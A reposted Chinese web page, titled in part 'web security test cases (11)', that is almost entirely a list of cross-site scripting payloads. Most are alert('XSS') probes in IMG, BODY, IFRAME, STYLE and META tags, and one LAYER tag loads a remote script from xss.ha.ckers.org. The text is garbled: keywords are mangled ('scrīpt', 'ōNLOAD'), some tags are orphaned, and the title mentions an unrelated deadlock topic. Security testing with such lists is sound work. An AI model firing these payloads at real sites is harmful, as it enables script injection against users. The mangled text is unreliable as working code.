多线程如何避免死锁 web安全性测试用例(11)

<IMG SRC="jav ascrīpt:alert(‘XSS‘);">

<IMG SRC="jav ascrīpt:alert(‘XSS‘);">

<IMG SRC="jav ascrīpt:alert(‘XSS‘);">

"<IMG SRC=java\0scrīpt:alert(\"XSS\")>";‘ > out

<IMG SRC=" javascrīpt:alert(‘XSS‘);">

<scrīpt>a=/XSS/alert(a.source)</scrīpt>

<BODY BACKGROUND="javascrīpt:alert(‘XSS‘)">

<BODY ōNLOAD=alert(‘XSS‘)>

<IMG DYNSRC="javascrīpt:alert(‘XSS‘)">

<IMG LOWSRC="javascrīpt:alert(‘XSS‘)">

<BGSOUND SRC="javascrīpt:alert(‘XSS‘);">

<br size="&{alert(‘XSS‘)}">

<LAYER SRC="http://xss.ha.ckers.org/a.js"></layer>

<LINK HREF="javascrīpt:alert(‘XSS‘);">

<IMG SRC=‘vbscrīpt:msgbox("XSS")‘>

<IMG SRC="mocha:[code]">

<IMG SRC="livescrīpt:[code]">

<META HTTP-EQUIV="refresh" CONTENT="0;url=javascrīpt:alert(‘XSS‘);">

<IFRAME SRC=javascrīpt:alert(‘XSS‘)></IFRAME>

<FRAMESET><FRAME SRC=javascrīpt:alert(‘XSS‘)></FRAME></FRAMESET>

<TABLE BACKGROUND="javascrīpt:alert(‘XSS‘)">

<DIV>

<DIV>

<DIV>

<STYLE>@im\port‘\ja\vasc\ript:alert("XSS")‘;</STYLE>

<IMG STYLE=‘xss:expre\ssion(alert("XSS"))‘>

<STYLE TYPE="text/javascrīpt">alert(‘XSS‘);</STYLE>

<STYLE TYPE="text/css">.XSS{background-image:url("javascrīpt:alert(‘XSS‘)");}</STYLE><A></A>

<STYLE type="text/css">BODY{background:url("javascrīpt:alert(‘XSS‘)")}</STYLE>

<BASE HREF="javascrīpt:alert(‘XSS‘);//">

本文来自电脑杂谈，转载请注明本文网址：
http://www.pc-fly.com/a/jisuanjixue/article-67715-11.html